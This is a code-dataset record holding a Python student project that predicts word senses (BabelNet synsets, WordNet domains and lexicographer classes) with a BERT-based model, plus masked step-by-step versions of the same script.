agentList.append(sum/len(byteList))\n lenAgentDic[UA] = agentList\n\ndef finalLenFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n avgModFunc(file)\n\ndef printLenDiff():\n finalLenFunc(dirName)\n finalLenFunc(dirName2)\n for keys, vals in lenAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[1] / vals[0]\n print (\"{:<15}: {:.2f}\".format(keys,score))\n else:\n score = \"N/A\"\n print (\"{:<15}: {}\".format(keys,score))\n lenAgentDic[keys] = score\n return lenAgentDic\n\ndef directoryModCont(directory):\n contentSet = set()\n newSet = set()\n listHolder = []\n numofReq = 0\n UA = directory.split(\"/\")[1]\n for filename in os.listdir(directory):\n file = directory + '/' + filename\n listHolder = factorStatFileCreator.contentCommand(file)\n #print(newSet)\n newSet = listHolder[0]\n numofReq += len(listHolder[1])\n contentSet = contentSet|newSet\n newSet = set()\n if UA not in contAgentDic.keys():\n contAgentDic[UA] = [numofReq]\n else:\n agentList = contAgentDic[UA]\n agentList.append(numofReq)\n contAgentDic[UA] = agentList\n return contentSet, numofReq\n\ndef finalContFunc(dirName):\n for filename in os.listdir(dirName):\n file = dirName + filename\n directoryModCont(file)\n\ndef printContDiff():\n finalContFunc(dirName)\n finalContFunc(dirName2)\n for keys, vals in contAgentDic.items():\n if len(vals) > 1 and vals[1] > 0:\n score = vals[0] / vals[1]\n print (\"{:<15}: {:.2f}\".format(keys,score))\n else:\n score = \"N/A\"\n print (\"{:<15}: {}\".format(keys,score))\n contAgentDic[keys] = score\n return contAgentDic\n", "step-ids": [ 7, 8, 9, 10, 12 ] }
[ 7, 8, 9, 10, 12 ]
from model import WSD from data_preprocessing import load_dataset, create_mapping_dictionary, reload_word_mapping,get_bn2wn,get_bn2wndomains, get_bn2lex from typing import List, Dict, Tuple from prova import convert_sentence_to_features_no_padding import numpy as np import os from nltk.corpus import wordnet mfs_counter = 0 def predict_babelnet(input_path : str, output_path : str, resources_path : str) -> None: global mfs_counter """ DO NOT MODIFY THE SIGNATURE! This is the skeleton of the prediction function. The predict function will build your model, load the weights from the checkpoint and write a new file (output_path) with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n"). The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission. N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code. If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded). :param output_path: the path of the output file (where you save your predictions) :param resources_path: the path of the resources folder containing your model and stuff you might need. :return: None """ print(">>>> BABELNET PREDICTION") prediction_results, sentences_xml_elements = __predict(input_path,resources_path) vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn') correctly_saved = 0 filename = os.path.normpath(input_path) filename = filename.split(os.sep)[-1] filename = filename[:-3]+"babelnet.gold.key.txt" for index in range(len(prediction_results)): correctly_saved += __write_result(filename, sentences_xml_elements[index], resources_path, output_path, prediction_results[index][0][0], vocab=vocab_label_bn, enable_coarse_grained=1, vocab_for_coarse=None) print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results))) del prediction_results print("Of these, {} were MFS".format(mfs_counter)) mfs_counter = 0 return def predict_wordnet_domains(input_path : str, output_path : str, resources_path : str) -> None: """ DO NOT MODIFY THE SIGNATURE! This is the skeleton of the prediction function. The predict function will build your model, load the weights from the checkpoint and write a new file (output_path) with your predictions in the "<id> <wordnetDomain>" format (e.g. "d000.s000.t000 sport"). The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission. N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code. If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded). :param output_path: the path of the output file (where you save your predictions) :param resources_path: the path of the resources folder containing your model and stuff you might need. :return: None """ global mfs_counter print(">>>> WORDNET DOMAINS PREDICTION") prediction_results, sentences_xml_elements = __predict(input_path,resources_path) vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn') correctly_saved = 0 bn2wndom = get_bn2wndomains() filename = os.path.normpath(input_path) filename = filename.split(os.sep)[-1] filename = filename[:-3]+"wndomains.gold.key.txt" for index in range(len(prediction_results)): correctly_saved += __write_result(filename, sentences_xml_elements[index], resources_path, output_path, prediction_results[index][1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2, vocab_for_coarse=bn2wndom) print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results))) del prediction_results print("Of these, {} were MFS".format(mfs_counter)) mfs_counter = 0 return def predict_lexicographer(input_path : str, output_path : str, resources_path : str) -> None: """ DO NOT MODIFY THE SIGNATURE! This is the skeleton of the prediction function. The predict function will build your model, load the weights from the checkpoint and write a new file (output_path) with your predictions in the "<id> <lexicographerId>" format (e.g. "d000.s000.t000 noun.animal"). The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission. N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code. If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded). :param output_path: the path of the output file (where you save your predictions) :param resources_path: the path of the resources folder containing your model and stuff you might need. :return: None """ global mfs_counter print(">>>> LEXICOGRAPHER PREDICTION") prediction_results, sentences_xml_elements = __predict(input_path, resources_path) vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex') correctly_saved = 0 filename = os.path.normpath(input_path) filename = filename.split(os.sep)[-1] bn2lex = get_bn2lex() filename = filename[:-3] + "lexicon.gold.key.txt" for index in range(len(prediction_results)): correctly_saved += __write_result(filename, sentences_xml_elements[index], resources_path,output_path, prediction_results[index][2][0], vocab= vocab_label_lex, enable_coarse_grained=3, vocab_for_coarse=bn2lex) print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results))) del prediction_results print("Of these, {} were MFS".format(mfs_counter)) mfs_counter = 0 return def __predict(input_path : str, resources_path : str) -> Tuple: """ Actually predicts a sentence and returns the predictions in the requested formats :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded). :param output_path: the path of the output file (where you save your predictions) :param resources_path: the path of the resources folder containing your model and stuff you might need. :return: The actual prediction by the network """ train, etree_data = load_dataset(input_path) train = [dato for dato in train if dato] vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn') vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn') vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex') modello = WSD(resources_path+"/vocabularies/bert_vocab.txt", [len(vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)], dropout=0.1, recurrent_dropout=0.1,learning_rate=0.0003) tokenizatore = modello.tokenizatore modello.model.load_weights(resources_path+"/saved_model/model_20_2.14.h5") to_return = [] sentences_xml_elements = etree_data.xpath("/*/*/*") for sentence in train: feature_1, feature_2, feature_3 = convert_sentence_to_features_no_padding(sentence,tokenizatore) results = modello.model.predict( {'input_word_ids': feature_1, 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1 ) to_return.append(results) del vocab_label_lex del vocab_label_wndmn del vocab_label_bn return to_return, sentences_xml_elements def __write_result(filename: str, frase, resources_path: str, outputh_path: str, predictions, vocab = None, enable_coarse_grained: int = 1, vocab_for_coarse = None) -> int: """ Write results in the file system :param filename: the name of the file to save :param frase: the object from which recover the sentence :param resources_path: the path of the resources folder containing your model and stuff you might need. :param output_path: the path of the output file (where you save your predictions) :param predictions: the predictions made by the system :param vocab: the vocab needed for giving a sense :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values: 1 --> Means I'm predicting with Babelnet. No extra precautions needed 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead 3 --> Means I'm predicting with Lexicon. Need to consult the vocab. :param vocab_for_coarse: The vocab in support of mode 2 or 3 :return: 1 if succeeds """ global mfs_counter bn2wn = get_bn2wn() lemma2wn = reload_word_mapping(resources_path+"/mapping/lemma2wn.txt") to_write = [] for index, parola in enumerate(frase): name = parola.xpath('name()') if name == 'instance': id = parola.get('id') list_of_possible_senses_first_step = lemma2wn.get(parola.text) if not list_of_possible_senses_first_step: # MFS the_actual_meaning = MFS(parola, bn2wn, vocab2=vocab_for_coarse, pred_case=enable_coarse_grained) mfs_counter += 1 to_write.append((id, the_actual_meaning)) continue list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(list_of_possible_senses_first_step, bn2wn) candidates,list_of_possible_senses_bn_version = create_custom_label(list_of_possible_senses_bn_version, parola.text, vocab, predictions[index], enable_coarse_grained=enable_coarse_grained) the_actual_meaning = None if candidates: argmax = np.argmax(candidates) the_actual_meaning = list_of_possible_senses_bn_version[argmax] else: #MFS mfs_counter += 1 the_actual_meaning = MFS(parola, bn2wn, vocab2=vocab_for_coarse, pred_case=enable_coarse_grained) to_write.append((id, the_actual_meaning)) with open(outputh_path + "/"+filename, "a") as test_saving: for tupla in to_write: test_saving.write(tupla[0] + " " + tupla[1]+"\n") del to_write del lemma2wn del bn2wn return 1 def MFS(parola, vocab: Dict, vocab2:Dict = None, pred_case: int = 1) -> str: """ Returns the sense by applying the Most Frequent Sense (MFS) strategy :param parola: the Element object to which associate a sense :param vocab: the vocab needed for giving a sense :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained :param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values: 1 --> Means I'm predicting with Babelnet. No extra precautions needed 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead 3 --> Means I'm predicting with Lexicon. Need to consult the vocab. :return: the chosen sense with the MFS technique """ pos = parola.get('pos') pos_input = __decide_pos(pos) wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input) try: wordnet_object = wordnet_object[0] except: print(wordnet_object) print(parola.text) wn_synset = "wn:" + str(wordnet_object.offset()).zfill(8) + wordnet_object.pos() the_actual_meaning = next(key for key, value in vocab.items() if wn_synset in value) to_return = __extrapolate_value_for_MFS(the_actual_meaning,vocab=vocab2, pred_case=pred_case) return to_return def __extrapolate_value_for_MFS(value: object, pred_case: int = 1, vocab: Dict = None) -> str: """ Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction :param value: The Value from which to extrapolate the actual meaning found :param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values: 1 --> Means I'm predicting with Babelnet. No extra precautions needed 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead 3 --> Means I'm predicting with Lexicon. Need to consult the vocab. :param vocab: The vocab in support of mode 2 or 3. :return: the actual meaning found with MFS """ the_meaning_to_explot = __type_checker(value) if pred_case == 1: return the_meaning_to_explot if pred_case == 2: to_return = vocab.get(the_meaning_to_explot) return to_return[0] if to_return else "factotum" if pred_case == 3: to_return = vocab.get(the_meaning_to_explot) return to_return[0] def __type_checker(value: object) -> str: """ Checks the type of the object and, accordingly, returns it :param value: the value to examinate :return: a string that is the value expected """ if type(value) == str: return value if type(value) == list: return value[0] def __decide_pos(pos: str) -> str: """ Decides the WN representation of the given pos in input :param pos: the pos to interpret with WordNet :return: the WN representation of the given pos """ to_return = None if pos == 'NOUN': to_return = "n" if pos == 'VERB': to_return = 'v' if pos == 'ADJ': to_return = 'a' if pos == 'ADV': to_return = 'r' return to_return def convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) -> List: """ Cast the given list (which contains only WN ids) to Babelnet IDs :param list_of_bn: the list to cast :param vocab: the vocabulary to use to perform the conversion :return: the converted list """ list_of_possible_senses_bn_version = [] for candidate in list_of_bn: is_it_here = next(key for key, value in vocab.items() if candidate in value) if is_it_here: list_of_possible_senses_bn_version.append(is_it_here if type(is_it_here) == str else is_it_here[0]) return list_of_possible_senses_bn_version def create_custom_label(list_of_possible_senses: List, word: str, vocab: Dict, predictions, enable_coarse_grained: int = 1) -> List: """ Converts the list of babelnet IDS to a number and outputs the converted list :param list_of_possible_senses: the list that contains all the babelnet's IDs :param word: the word for which we are predicting the sense in a specific moment :param vocab: the vocabulary Word -> Serial to exploit for the conversion :param predictions: the predictions made by the system :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values: 1 --> The flow will still be the same 2,3 -> Flow will change, triggering the first step for the coarse-grained approach. :return: a List with the IDs converted """ to_return = [] list_of_indices_to_delete = [] for indice in range(len(list_of_possible_senses)): new_string = word + "_" + list_of_possible_senses[indice] if enable_coarse_grained == 1 else list_of_possible_senses[indice] conversion = None try: conversion = int(vocab[new_string]) to_return.append(predictions[conversion]) except: list_of_indices_to_delete.append(indice) continue if list_of_indices_to_delete: list_of_possible_senses = [list_of_possible_senses[prov_index] for prov_index in range(len(list_of_possible_senses)) if prov_index not in list_of_indices_to_delete] return to_return, list_of_possible_senses if __name__ == "__main__": predict_babelnet("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources") #predict_wordnet_domains("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources") #predict_lexicographer("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources")
normal
{ "blob_id": "e3631a2a003f98fbf05c45a019250e76d3366949", "index": 2582, "step-1": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\n<mask token>\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. 